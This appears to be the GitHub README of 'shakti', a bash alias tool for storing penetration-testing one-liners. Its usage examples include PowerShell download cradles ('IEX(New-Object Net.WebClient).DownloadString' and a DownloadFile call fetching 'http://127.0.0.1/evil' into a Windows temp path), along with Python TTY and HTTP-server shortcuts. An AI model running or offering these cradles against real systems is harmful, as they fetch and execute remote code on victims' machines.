Skip to content

spyx/shakti

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 

Repository files navigation

Magic

Intruduction

Simple tool to help with long repetitive shortcuts

Usage

List all shortucts

./shakti.sh list

 ▄▀▀▀▀▄  ▄▀▀▄ ▄▄   ▄▀▀█▄   ▄▀▀▄ █  ▄▀▀▀█▀▀▄  ▄▀▀█▀▄   
█ █   ▐ █  █   ▄▀ ▐ ▄▀ ▀▄ █  █ ▄▀ █    █  ▐ █   █  █  
   ▀▄   ▐  █▄▄▄█    █▄▄▄█ ▐  █▀▄  ▐   █     ▐   █  ▐  
▀▄   █     █   █   ▄▀   █   █   █    █          █     
 █▀▀▀     ▄▀  ▄▀  █   ▄▀  ▄▀   █   ▄▀        ▄▀▀▀▀▀▄  
 ▐       █   █    ▐   ▐   █    ▐  █         █       █ 
         ▐   ▐            ▐       ▐         ▐       ▐           
    Cosmic alias


Shortcut	|	Command
========================================================
list		-	List all commands
add [shotcut] [cmd]-	Add or modify existing shortcut
dell [shortcut]	-	Delete shorcut
info [shortcut]	-	Get Shortcut info details
tty		-	get python tty
http		-	Python server
iex		-	Powershell test
psds		-	Powershell IEX Download String

Get information about shorcut

./shakti.sh info psds

 ▄▀▀▀▀▄  ▄▀▀▄ ▄▄   ▄▀▀█▄   ▄▀▀▄ █  ▄▀▀▀█▀▀▄  ▄▀▀█▀▄   
█ █   ▐ █  █   ▄▀ ▐ ▄▀ ▀▄ █  █ ▄▀ █    █  ▐ █   █  █  
   ▀▄   ▐  █▄▄▄█    █▄▄▄█ ▐  █▀▄  ▐   █     ▐   █  ▐  
▀▄   █     █   █   ▄▀   █   █   █    █          █     
 █▀▀▀     ▄▀  ▄▀  █   ▄▀  ▄▀   █   ▄▀        ▄▀▀▀▀▀▄  
 ▐       █   █    ▐   ▐   █    ▐  █         █       █ 
         ▐   ▐            ▐       ▐         ▐       ▐           
    Cosmic alias


Shortcut :psds
Command: echo -n "IEX(New-Object Net.WebClient).DownloadString(\"$2\")"| xclip -selection clipboard;echo "Copied"

Description: Powershell IEX Download String

Add command

$ ./shakti.sh add psdf 'echo "IEX(New-Object Net.WebClient).DownloadFile(\"$2\",\"$3\")"' 'Powershell Download Files'
Shortcut psdf added

Run your shortcut

./shakti.sh psdf 'http://127.0.0.1/evil' 'C:\windows\tmp\very_nice_app'
IEX(New-Object Net.WebClient).DownloadFile("http://127.0.0.1/evil","C:\windows\tmp\very_nice_app")

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages